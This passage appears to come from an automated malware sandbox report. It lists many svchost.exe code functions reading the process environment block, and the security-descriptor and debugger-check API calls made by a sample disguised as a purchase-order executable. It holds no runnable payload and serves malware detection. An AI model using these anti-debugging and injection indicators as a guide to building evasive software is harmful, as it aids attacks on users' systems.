            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]2_2_039EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]2_2_0396A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]2_2_039EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]2_2_039BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]2_2_039DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]2_2_0395EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]2_2_039BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h]2_2_03A04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h]2_2_03928B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]2_2_039DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]2_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]2_2_039D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]2_2_0392CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]2_2_03968A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]2_2_03A04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]2_2_03986AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]2_2_03930AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]2_2_039BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]2_2_0396CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]2_2_0396CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]2_2_0395EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]2_2_039DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]2_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]2_2_039649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]2_2_039FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]2_2_039C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]2_2_039BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]2_2_039BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]2_2_039B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]2_2_039C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]2_2_039B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h]2_2_03A04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]2_2_039BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]2_2_039BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]2_2_03930887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]2_2_0395E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h]2_2_03A008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]2_2_039FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]2_2_039BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001B0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_001B0B62
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_00182622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00182622
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_0017083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0017083F
